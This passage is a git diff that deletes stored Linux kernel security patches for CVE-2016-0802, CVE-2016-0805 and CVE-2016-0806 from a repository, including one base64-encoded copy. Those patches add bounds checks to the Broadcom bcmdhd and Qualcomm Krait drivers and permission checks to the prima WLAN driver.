-+dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event, size_t pktlen)
- {
- 	bcm_dngl_event_msg_t *dngl_event = &event->dngl_event;
- 	uint8 *p = (uint8 *)(event + 1);
-@@ -1407,6 +1407,9 @@
- 	uint16 version = ntoh16_ua((void *)&dngl_event->version);
- 
- 	DHD_EVENT(("VERSION:%d, EVENT TYPE:%d, DATALEN:%d\n", version, type, datalen));
-+	if (datalen > (pktlen - sizeof(bcm_event_t))) {
-+		return;
-+	}
- 	if (version != BCM_DNGL_EVENT_MSG_VERSION) {
- 		DHD_ERROR(("%s:version mismatch:%d:%d\n", __FUNCTION__,
- 			version, BCM_DNGL_EVENT_MSG_VERSION));
-@@ -1499,7 +1502,7 @@
- }
- #endif /* DNGL_EVENT_SUPPORT */
- 
--int wl_host_event(dhd_pub_t *dhd_pub, int *ifidx, void *pktdata,
-+int wl_host_event(dhd_pub_t *dhd_pub, int *ifidx, void *pktdata, size_t pktlen,
- 	wl_event_msg_t *event, void **data_ptr, void *raw_event)
- {
- 	/* check whether packet is a BRCM event pkt */
-@@ -1512,7 +1515,7 @@
- 
- #ifdef DNGL_EVENT_SUPPORT
- 	/* If it is a DNGL event process it first */
--	if (dngl_host_event(dhd_pub, pktdata) == BCME_OK) {
-+	if (dngl_host_event(dhd_pub, pktdata, pktlen) == BCME_OK) {
- 		/* Return error purposely to prevent DNGL event being processed as BRCM event */
- 		return BCME_ERROR;
- 	}
-@@ -1529,18 +1532,27 @@
- 		return (BCME_ERROR);
- 	}
- 
-+	if (pktlen < sizeof(bcm_event_t))
-+		return (BCME_ERROR);
-+
- 	*data_ptr = &pvt_data[1];
- 	event_data = *data_ptr;
- 
--
- 	/* memcpy since BRCM event pkt may be unaligned. */
- 	memcpy(event, &pvt_data->event, sizeof(wl_event_msg_t));
- 
- 	type = ntoh32_ua((void *)&event->event_type);
- 	flags = ntoh16_ua((void *)&event->flags);
- 	status = ntoh32_ua((void *)&event->status);
-+
- 	datalen = ntoh32_ua((void *)&event->datalen);
-+	if (datalen > pktlen)
-+		return (BCME_ERROR);
-+
- 	evlen = datalen + sizeof(bcm_event_t);
-+	if (evlen > pktlen) {
-+		return BCME_ERROR;
-+	}
- 
- 	/* find equivalent host index for event ifidx */
- 	hostidx = dhd_ifidx2hostidx(dhd_pub->info, event->ifidx);
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 3998402..7c0563a 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -700,7 +700,7 @@
- static int dhd_toe_set(dhd_info_t *dhd, int idx, uint32 toe_ol);
- #endif /* TOE */
- 
--static int dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata,
-+static int dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
-                              wl_event_msg_t *event_ptr, void **data_ptr);
- #ifdef DHD_UNICAST_DHCP
- static const uint8 llc_snap_hdr[SNAP_HDR_LEN] = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00};
-@@ -3018,6 +3018,7 @@
- #else
- 			skb->mac.raw,
- #endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 22) */
-+			len - 2,
- 			&event,
- 			&data);
- 
-@@ -7452,16 +7453,18 @@
- #endif /* defined(WL_WIRELESS_EXT) */
- 
- static int
--dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata,
-+dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
- 	wl_event_msg_t *event, void **data)
- {
- 	int bcmerror = 0;
- 	ASSERT(dhd != NULL);
- 
- #ifdef SHOW_LOGTRACE
--		bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, event, data, &dhd->event_data);
-+		bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, pktlen,
-+				event, data, &dhd->event_data);
- #else
--		bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, event, data, NULL);
-+		bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, pktlen,
-+				event, data, NULL);
- #endif /* SHOW_LOGTRACE */
- 
- 	if (bcmerror != BCME_OK)
diff --git a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64
deleted file mode 100644
index 35ff7ed6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC9kaGQuaCBiL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC9kaGQuaAppbmRleCA4YzNmMGY2Li41ZTMzMjYyIDEwMDY0NAotLS0gYS9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvZGhkLmgKKysrIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL2RoZC5oCkBAIC04MTMsNyArODEzLDcgQEAKIGV4dGVybiBpbnQgZGhkX25ldDJpZHgoc3RydWN0IGRoZF9pbmZvICpkaGQsIHN0cnVjdCBuZXRfZGV2aWNlICpuZXQpOwogZXh0ZXJuIHN0cnVjdCBuZXRfZGV2aWNlICogZGhkX2lkeDJuZXQodm9pZCAqcHViLCBpbnQgaWZpZHgpOwogZXh0ZXJuIGludCBuZXRfb3Nfc2VuZF9oYW5nX21lc3NhZ2Uoc3RydWN0IG5ldF9kZXZpY2UgKmRldik7Ci1leHRlcm4gaW50IHdsX2hvc3RfZXZlbnQoZGhkX3B1Yl90ICpkaGRfcHViLCBpbnQgKmlkeCwgdm9pZCAqcGt0ZGF0YSwKK2V4dGVybiBpbnQgd2xfaG9zdF9ldmVudChkaGRfcHViX3QgKmRoZF9wdWIsIGludCAqaWR4LCB2b2lkICpwa3RkYXRhLCBzaXplX3QgcGt0bGVuLAogICAgICAgICAgICAgICAgICAgICAgICAgIHdsX2V2ZW50X21zZ190ICosIHZvaWQgKipkYXRhX3B0ciwgIHZvaWQgKik7CiBleHRlcm4gdm9pZCB3bF9ldmVudF90b19ob3N0X29yZGVyKHdsX2V2ZW50X21zZ190ICogZXZ0KTsKIApkaWZmIC0tZ2l0IGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL2RoZF9jb21tb24uYyBiL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC9kaGRfY29tbW9uLmMKaW5kZXggOGE2ODgyZi4uMjAxYTBhYyAxMDA2NDQKLS0tIGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL2RoZF9jb21tb24uYworKysgYi9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvZGhkX2NvbW1vbi5jCkBAIC0xMDksNyArMTA5LDcgQEAKIGV4dGVybiBpbnQgZGhkX3NvY3JhbV9kdW1wKHN0cnVjdCBkaGRfYnVzICpidXMpOwogI2lmZGVmIEROR0xfRVZFTlRfU1VQUE9SVAogc3RhdGljIHZvaWQgZG5nbF9ob3N0X2V2ZW50X3Byb2Nlc3MoZGhkX3B1Yl90ICpkaGRwLCBiY21fZG5nbF9ldmVudF90ICpldmVudCk7Ci1zdGF0aWMgaW50IGRuZ2xfaG9zdF9ldmVudChkaGRfcHViX3QgKmRoZHAsIHZvaWQgKnBrdGRhdGEpOworc3RhdGljIGludCBkbmdsX2hvc3RfZXZlbnQoZGhkX3B1Yl90ICpkaGRwLCB2b2lkICpwa3RkYXRhLCBzaXplX3QgcGt0bGVuKTsKICNlbmRpZiAvKiBETkdMX0VWRU5UX1NVUFBPUlQgKi8KIGJvb2wgYXBfY2ZnX3J1bm5pbmcgPSBGQUxTRTsKIGJvb2wgYXBfZndfbG9hZGVkID0gRkFMU0U7CkBAIC0xMzgwLDcgKzEzODAsNyBAQAogI2lmZGVmIEROR0xfRVZFTlRfU1VQUE9SVAogLyogQ2hlY2sgd2hldGhlciBwYWNrZXQgaXMgYSBCUkNNIGRuZ2wgZXZlbnQgcGt0LiBJZiBpdCBpcywgcHJvY2VzcyBldmVudCBkYXRhLiAqLwogaW50Ci1kbmdsX2hvc3RfZXZlbnQoZGhkX3B1Yl90ICpkaGRwLCB2b2lkICpwa3RkYXRhKQorZG5nbF9ob3N0X2V2ZW50KGRoZF9wdWJfdCAqZGhkcCwgdm9pZCAqcGt0ZGF0YSwgc2l6ZV90IHBrdGxlbikKIHsKIAliY21fZG5nbF9ldmVudF90ICpwdnRfZGF0YSA9IChiY21fZG5nbF9ldmVudF90ICopcGt0ZGF0YTsKIApAQCAtMTM5MSwxNCArMTM5MSwxNCBAQAogCS8qIENoZWNrIHRvIHNlZSBpZiB0aGlzIGlzIGEgRE5HTCBldmVudCAqLwogCWlmIChudG9oMTZfdWEoKHZvaWQgKikmcHZ0X2RhdGEtPmJjbV9oZHIudXNyX3N1YnR5cGUpID09CiAJCUJDTUlMQ1BfQkNNX1NVQlRZUEVfRE5HTEVWRU5UKSB7Ci0gIAkJZG5nbF9ob3N0X2V2ZW50X3Byb2Nlc3MoZGhkcCwgcHZ0X2RhdGEpOworICAJCWRuZ2xfaG9zdF9ldmVudF9wcm9jZXNzKGRoZHAsIHB2dF9kYXRhLCBwa3RsZW4pOwogCQlyZXR1cm4gQkNNRV9PSzsKIAl9CiAJcmV0dXJuIEJDTUVfRVJST1I7CiB9CiAKIHZvaWQKLWRuZ2xfaG9zdF9ldmVudF9wcm9jZXNzKGRoZF9wdWJfdCAqZGhkcCwgYmNtX2RuZ2xfZXZlbnRfdCAqZXZlbnQpCitkbmdsX2hvc3RfZXZlbnRfcHJvY2VzcyhkaGRfcHViX3QgKmRoZHAsIGJjbV9kbmdsX2V2ZW50X3QgKmV2ZW50LCBzaXplX3QgcGt0bGVuKQogewogCWJjbV9kbmdsX2V2ZW50X21zZ190ICpkbmdsX2V2ZW50ID0gJmV2ZW50LT5kbmdsX2V2ZW50OwogCXVpbnQ4ICpwID0gKHVpbnQ4ICopKGV2ZW50ICsgMSk7CkBAIC0xNDA3LDYgKzE0MDcsOSBAQAogCXVpbnQxNiB2ZXJzaW9uID0gbnRvaDE2X3VhKCh2b2lkICopJmRuZ2xfZXZlbnQtPnZlcnNpb24pOwogCiAJREhEX0VWRU5UKCgiVkVSU0lPTjolZCwgRVZFTlQgVFlQRTolZCwgREFUQUxFTjolZFxuIiwgdmVyc2lvbiwgdHlwZSwgZGF0YWxlbikpOworCWlmIChkYXRhbGVuID4gKHBrdGxlbiAtIHNpemVvZihiY21fZXZlbnRfdCkpKSB7CisJCXJldHVybjsKKwl9CiAJaWYgKHZlcnNpb24gIT0gQkNNX0ROR0xfRVZFTlRfTVNHX1ZFUlNJT04pIHsKIAkJREhEX0VSUk9SKCgiJXM6dmVyc2lvbiBtaXNtYXRjaDolZDolZFxuIiwgX19GVU5DVElPTl9fLAogCQkJdmVyc2lvbiwgQkNNX0ROR0xfRVZFTlRfTVNHX1ZFUlNJT04pKTsKQEAgLTE0OTksNyArMTUwMiw3IEBACiB9CiAjZW5kaWYgLyogRE5HTF9FVkVOVF9TVVBQT1JUICovCiAKLWludCB3bF9ob3N0X2V2ZW50KGRoZF9wdWJfdCAqZGhkX3B1YiwgaW50ICppZmlkeCwgdm9pZCAqcGt0ZGF0YSwKK2ludCB3bF9ob3N0X2V2ZW50KGRoZF9wdWJfdCAqZGhkX3B1YiwgaW50ICppZmlkeCwgdm9pZCAqcGt0ZGF0YSwgc2l6ZV90IHBrdGxlbiwKIAl3bF9ldmVudF9tc2dfdCAqZXZlbnQsIHZvaWQgKipkYXRhX3B0ciwgdm9pZCAqcmF3X2V2ZW50KQogewogCS8qIGNoZWNrIHdoZXRoZXIgcGFja2V0IGlzIGEgQlJDTSBldmVudCBwa3QgKi8KQEAgLTE1MTIsNyArMTUxNSw3IEBACiAKICNpZmRlZiBETkdMX0VWRU5UX1NVUFBPUlQKIAkvKiBJZiBpdCBpcyBhIEROR0wgZXZlbnQgcHJvY2VzcyBpdCBmaXJzdCAqLwotCWlmIChkbmdsX2hvc3RfZXZlbnQoZGhkX3B1YiwgcGt0ZGF0YSkgPT0gQkNNRV9PSykgeworCWlmIChkbmdsX2hvc3RfZXZlbnQoZGhkX3B1YiwgcGt0ZGF0YSwgcGt0bGVuKSA9PSBCQ01FX09LKSB7CiAJCS8qIFJldHVybiBlcnJvciBwdXJwb3NlbHkgdG8gcHJldmVudCBETkdMIGV2ZW50IGJlaW5nIHByb2Nlc3NlZCBhcyBCUkNNIGV2ZW50ICovCiAJCXJldHVybiBCQ01FX0VSUk9SOwogCX0KQEAgLTE1MjksMTggKzE1MzIsMjcgQEAKIAkJcmV0dXJuIChCQ01FX0VSUk9SKTsKIAl9CiAKKwlpZiAocGt0bGVuIDwgc2l6ZW9mKGJjbV9ldmVudF90KSkKKwkJcmV0dXJuIChCQ01FX0VSUk9SKTsKKwogCSpkYXRhX3B0ciA9ICZwdnRfZGF0YVsxXTsKIAlldmVudF9kYXRhID0gKmRhdGFfcHRyOwogCi0KIAkvKiBtZW1jcHkgc2luY2UgQlJDTSBldmVudCBwa3QgbWF5IGJlIHVuYWxpZ25lZC4gKi8KIAltZW1jcHkoZXZlbnQsICZwdnRfZGF0YS0+ZXZlbnQsIHNpemVvZih3bF9ldmVudF9tc2dfdCkpOwogCiAJdHlwZSA9IG50b2gzMl91YSgodm9pZCAqKSZldmVudC0+ZXZlbnRfdHlwZSk7CiAJZmxhZ3MgPSBudG9oMTZfdWEoKHZvaWQgKikmZXZlbnQtPmZsYWdzKTsKIAlzdGF0dXMgPSBudG9oMzJfdWEoKHZvaWQgKikmZXZlbnQtPnN0YXR1cyk7CisKIAlkYXRhbGVuID0gbnRvaDMyX3VhKCh2b2lkICopJmV2ZW50LT5kYXRhbGVuKTsKKwlpZiAoZGF0YWxlbiA+IHBrdGxlbikKKwkJcmV0dXJuIChCQ01FX0VSUk9SKTsKKwogCWV2bGVuID0gZGF0YWxlbiArIHNpemVvZihiY21fZXZlbnRfdCk7CisJaWYgKGV2bGVuID4gcGt0bGVuKSB7CisJCXJldHVybiBCQ01FX0VSUk9SOworCX0KIAogCS8qIGZpbmQgZXF1aXZhbGVudCBob3N0IGluZGV4IGZvciBldmVudCBpZmlkeCAqLwogCWhvc3RpZHggPSBkaGRfaWZpZHgyaG9zdGlkeChkaGRfcHViLT5pbmZvLCBldmVudC0+aWZpZHgpOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL2RoZF9saW51eC5jIGIvZHJpdmVycy9uZXQvd2lyZWxlc3MvYmNtZGhkL2RoZF9saW51eC5jCmluZGV4IDM5OTg0MDIuLjdjMDU2M2EgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvbmV0L3dpcmVsZXNzL2JjbWRoZC9kaGRfbGludXguYworKysgYi9kcml2ZXJzL25ldC93aXJlbGVzcy9iY21kaGQvZGhkX2xpbnV4LmMKQEAgLTcwMCw3ICs3MDAsNyBAQAogc3RhdGljIGludCBkaGRfdG9lX3NldChkaGRfaW5mb190ICpkaGQsIGludCBpZHgsIHVpbnQzMiB0b2Vfb2wpOwogI2VuZGlmIC8qIFRPRSAqLwogCi1zdGF0aWMgaW50IGRoZF93bF9ob3N0X2V2ZW50KGRoZF9pbmZvX3QgKmRoZCwgaW50ICppZmlkeCwgdm9pZCAqcGt0ZGF0YSwKK3N0YXRpYyBpbnQgZGhkX3dsX2hvc3RfZXZlbnQoZGhkX2luZm9fdCAqZGhkLCBpbnQgKmlmaWR4LCB2b2lkICpwa3RkYXRhLCBzaXplX3QgcGt0bGVuLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3bF9ldmVudF9tc2dfdCAqZXZlbnRfcHRyLCB2b2lkICoqZGF0YV9wdHIpOwogI2lmZGVmIERIRF9VTklDQVNUX0RIQ1AKIHN0YXRpYyBjb25zdCB1aW50OCBsbGNfc25hcF9oZHJbU05BUF9IRFJfTEVOXSA9IHsweGFhLCAweGFhLCAweDAzLCAweDAwLCAweDAwLCAweDAwfTsKQEAgLTMwMTgsNiArMzAxOCw3IEBACiAjZWxzZQogCQkJc2tiLT5tYWMucmF3LAogI2VuZGlmIC8qIExJTlVYX1ZFUlNJT05fQ09ERSA+PSBLRVJORUxfVkVSU0lPTigyLCA2LCAyMikgKi8KKwkJCWxlbiAtIDIsCiAJCQkmZXZlbnQsCiAJCQkmZGF0YSk7CiAKQEAgLTc0NTIsMTYgKzc0NTMsMTggQEAKICNlbmRpZiAvKiBkZWZpbmVkKFdMX1dJUkVMRVNTX0VYVCkgKi8KIAogc3RhdGljIGludAotZGhkX3dsX2hvc3RfZXZlbnQoZGhkX2luZm9fdCAqZGhkLCBpbnQgKmlmaWR4LCB2b2lkICpwa3RkYXRhLAorZGhkX3dsX2hvc3RfZXZlbnQoZGhkX2luZm9fdCAqZGhkLCBpbnQgKmlmaWR4LCB2b2lkICpwa3RkYXRhLCBzaXplX3QgcGt0bGVuLAogCXdsX2V2ZW50X21zZ190ICpldmVudCwgdm9pZCAqKmRhdGEpCiB7CiAJaW50IGJjbWVycm9yID0gMDsKIAlBU1NFUlQoZGhkICE9IE5VTEwpOwogCiAjaWZkZWYgU0hPV19MT0dUUkFDRQotCQliY21lcnJvciA9IHdsX2hvc3RfZXZlbnQoJmRoZC0+cHViLCBpZmlkeCwgcGt0ZGF0YSwgZXZlbnQsIGRhdGEsICZkaGQtPmV2ZW50X2RhdGEpOworCQliY21lcnJvciA9IHdsX2hvc3RfZXZlbnQoJmRoZC0+cHViLCBpZmlkeCwgcGt0ZGF0YSwgcGt0bGVuLAorCQkJCWV2ZW50LCBkYXRhLCAmZGhkLT5ldmVudF9kYXRhKTsKICNlbHNlCi0JCWJjbWVycm9yID0gd2xfaG9zdF9ldmVudCgmZGhkLT5wdWIsIGlmaWR4LCBwa3RkYXRhLCBldmVudCwgZGF0YSwgTlVMTCk7CisJCWJjbWVycm9yID0gd2xfaG9zdF9ldmVudCgmZGhkLT5wdWIsIGlmaWR4LCBwa3RkYXRhLCBwa3RsZW4sCisJCQkJZXZlbnQsIGRhdGEsIE5VTEwpOwogI2VuZGlmIC8qIFNIT1dfTE9HVFJBQ0UgKi8KIAogCWlmIChiY21lcnJvciAhPSBCQ01FX09LKQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch
deleted file mode 100644
index 7bcaa942..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b3f0b1f694258b3b3debc5256eec94bb2a9eb454 Mon Sep 17 00:00:00 2001
-From: Swetha Chikkaboraiah <schikk@codeaurora.org>
-Date: Wed, 27 Jan 2016 11:46:54 +0530
-Subject: [PATCH] msm: perf: Protect buffer overflow due to malicious user
-
-In function krait_pmu_disable_event, parameter hwc comes from
-userspace and is untrusted.The function krait_clearpmu is called
-after the function get_krait_evtinfo.
-Function get_krait_evtinfo as parameter krait_evt_type variable
-which is used to extract the groupcode(reg) which is bound to
- KRAIT_MAX_L1_REG (is 3). After validation,one code path modifies
-groupcode(reg):If this code path executes, groupcode(reg) can be
-3,4, 5, or 6. In krait_clearpmu groupcode used to access array
-krait_functions whose size is 3. Since groupcode can be 3,4,5,6
-accessing array krait_functions lead to bufferoverlflow.
-This change will validate groupcode not to exceed 3.
-
-CVE-2016-0805 Bug:ANDROID-25773204
-
-Change-Id: I48c92adda137d8a074b4e1a367a468195a810ca1
-CRs-fixed: 962450
-Signed-off-by: Swetha Chikkaboraiah <schikk@codeaurora.org>
-Signed-off-by: Karthik Jadala <karthikjk@codeaurora.org>
----
- arch/arm/kernel/perf_event_msm_krait.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/arch/arm/kernel/perf_event_msm_krait.c b/arch/arm/kernel/perf_event_msm_krait.c
-index 49aae5a66b650..34f9b4e5b099d 100644
---- a/arch/arm/kernel/perf_event_msm_krait.c
-+++ b/arch/arm/kernel/perf_event_msm_krait.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2014, 2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -208,9 +208,6 @@ static unsigned int get_krait_evtinfo(unsigned int krait_evt_type,
- 	code = (krait_evt_type & 0x00FF0) >> 4;
- 	group = krait_evt_type & 0x0000F;
- 
--	if ((group > 3) || (reg > KRAIT_MAX_L1_REG))
--		return -EINVAL;
--
- 	if (prefix != KRAIT_EVT_PREFIX && prefix != KRAIT_VENUMEVT_PREFIX)
- 		return -EINVAL;
- 
-@@ -221,6 +218,9 @@ static unsigned int get_krait_evtinfo(unsigned int krait_evt_type,
- 			reg += VENUM_BASE_OFFSET;
- 	}
- 
-+	if ((group > 3) || (reg > KRAIT_MAX_L1_REG))
-+		return -EINVAL;
-+
- 	evtinfo->group_setval = 0x80000000 | (code << (group * 8));
- 	evtinfo->groupcode = reg;
- 	evtinfo->armv7_evt_type = evt_type_base[reg] | group;
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch
deleted file mode 100644
index db0a3b88..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 1fac73337080712109029302599945d1ac36c799 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 09:55:27 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_OEM_DATA_REQ IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I651656fe11d4235232b76c972b5460b57e608449
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-index c796abd..2bbb38f 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -203,6 +203,12 @@ int iw_set_oem_data_req(
-     hdd_adapter_t *pAdapter = (netdev_priv(dev));
-     hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch
deleted file mode 100644
index 83db5256..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From e9dcd5aa01734b019c793220531e4ef1d82959f8 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:06:03 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_CHAR_GET_NONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Iccf25a9d1f1a7c13d3aaf2fc4bd3aebba740dbb2
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 964ed65..5e03595 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -3864,6 +3864,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-     hdd_config_t  *pConfig = pHddCtx->cfg_ini;
- #endif /* WLAN_FEATURE_VOWIFI */
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch
deleted file mode 100644
index 01eb45b2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From fd13b59e5a75b761f68fe34f09df1dce7a49acc2 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:11:40 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_PACKET_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I1edc65ee26c5e3e4260e0f6546434b0137493396
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 5e03595..6a806f4 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -5834,6 +5834,13 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
-     tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer;
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+		FL("permission check failed"));
-+      return -EPERM;
-+    }
-+
-     return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
- }
- #endif
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch
deleted file mode 100644
index 76ca4267..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From fbb8f120ee729d47869f0bebe5bc31e83bcf2876 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma <mukul@qti.qualcomm.com>
-Date: Thu, 17 Mar 2016 10:28:36 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Ia2465433aab6366160a167a62ca03e0ba720bcdb
-Signed-off-by: Yuan Lin <yualin@google.com>
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 6a806f4..9b41a5e 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -4508,6 +4508,13 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
-     int cmd = 0;
-     int staId = 0;
- 
-+    if (!capable(CAP_NET_ADMIN))
-+    {
